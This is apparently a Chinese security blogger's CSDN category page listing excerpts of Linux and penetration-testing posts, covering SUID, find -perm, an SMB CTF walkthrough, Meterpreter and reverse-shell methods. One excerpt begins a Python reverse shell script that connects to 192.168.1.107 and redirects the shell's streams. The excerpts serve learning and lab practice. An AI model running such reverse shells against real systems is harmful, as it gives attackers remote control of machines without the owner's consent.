![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Linux基础
暮秋初九
专注于web漏洞挖掘、内网渗透、免杀和代码审计,感谢各位师傅的关注!网安之路漫长,与君共勉!vx公众号:不懂安全的果冻
展开
-
ssh登录提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!
在做ssh服务测试的时候,使用下载下来的私钥进行靶机连接,发现出现了一下问题。大概的意思就是,私钥文件出错误了,怎么会出错误呢?仔细一看原来攻击机中出于用户自身的原因(对私钥进行改名、移动),导致出现了多个私钥。Add correct host key in /root/.ssh/known_hosts to get rid of this message.//在/root/.ssh/kno...原创 2019-07-06 18:05:42 · 306 阅读 · 0 评论 -
/目录 、/home目录 、~目录的区别
/ :根目录cd / : 从任何用户执行该命令都会进入同一个目录,即所有用户共享。/home :家目录(我觉得还不如叫用户列表目录)cd /home :会显示这台机器的用户~ :当前用户的家目录在imooc用户下登录:cd ~ 等价于 cd /home/imooc :会进入当前用户的家目录(一般情况连接上机器都是在这个目录,一般操作也都是在这里)...原创 2019-07-06 16:31:26 · 1966 阅读 · 0 评论 -
linux下根据文件权限查找文件
**根据文件权限查找**按文件权限查找,需要用到-perm选项,根据对权限的设置条件不同,该选项又分为三种用法:l -perm mode:精确匹配mode所表示的条件。l -perm /mode:任何一类用户(ugo)的权限中的任何一位(rwx)符合mode所表示的条件即可,9位权限之间存在“或”关系。l -perm -mode:任何一类用户(ugo)的权限中的每一位(rwx)都...原创 2019-07-05 20:09:54 · 3737 阅读 · 0 评论 -
linux权限体系(三)特殊权限SUID、SGID
一、SUID1.1 基础知识SUID 是针对二进制可执行文件而言的,他的最终目的是所有用户在执行设置了SUID的二进制可执行文件时,该二进制拥有的权限是文件所有者的权限。(打破安全上下文法则)。案例理解[root@tysonscloud ~]# ls -l /bin/passwd -rwsr-xr-x. 1 root root 27832 Jun 10 2014 /bin/passwd...原创 2019-07-05 20:07:11 · 1058 阅读 · 1 评论 -
ctf—夺旗赛smb信息泄露
**一、协议介绍****二、信息探测**扫描开放服务:root@kali:~# nmap -sV 192.168.1.109Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:39 CSTNmap scan report for 192.168.1.109Host is up (0.0024s late...原创 2019-07-10 17:35:45 · 1990 阅读 · 0 评论 -
Meterpreter命令详解
文章讲的比较浅显易懂,比较深奥的东西我就不写了。0x01初识Meterpreter1.1.什么是MeterpreterMeterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块...原创 2019-07-10 17:34:30 · 1511 阅读 · 0 评论 -
Linux 网络通讯 : smbclient 命令详解
smbclient命令属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源。语法smbclient(选项)(参数) -B<ip地址>:传送广播数据包时所用的IP地址; -d<排错层级>:指定记录文件所记载事件的详细程度; -E:将信息送到标准错误输出设备; -h:显示帮助; ...原创 2019-07-10 17:18:29 · 505 阅读 · 0 评论 -
关于su、sudo、sudo -i的区别
原创 2019-07-10 15:56:17 · 437 阅读 · 0 评论 -
Linux /etc/passwd内容解释
**这个文件中保存的就是系统中所有的用户和用户的主要信息。**默认情况下,/etc/passwd 存储有关本地用户的信息/etc/passwd 采用以下格式:1)username UID到名称的一种映射,用户名 2)password 保存密码的位置,现在保存在/etc/shadow 中 3)UID 用户ID...原创 2019-07-10 15:42:13 · 1287 阅读 · 0 评论 -
使用python反弹shell
先上脚本:#!/usr/bin/python#coding=utf-8import os,subprocess,socket s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.1.107",19))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)...原创 2019-07-10 10:06:25 · 2012 阅读 · 0 评论 -
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。实验环境:CentOS 6.5:192.168...原创 2019-07-10 09:47:36 · 2135 阅读 · 0 评论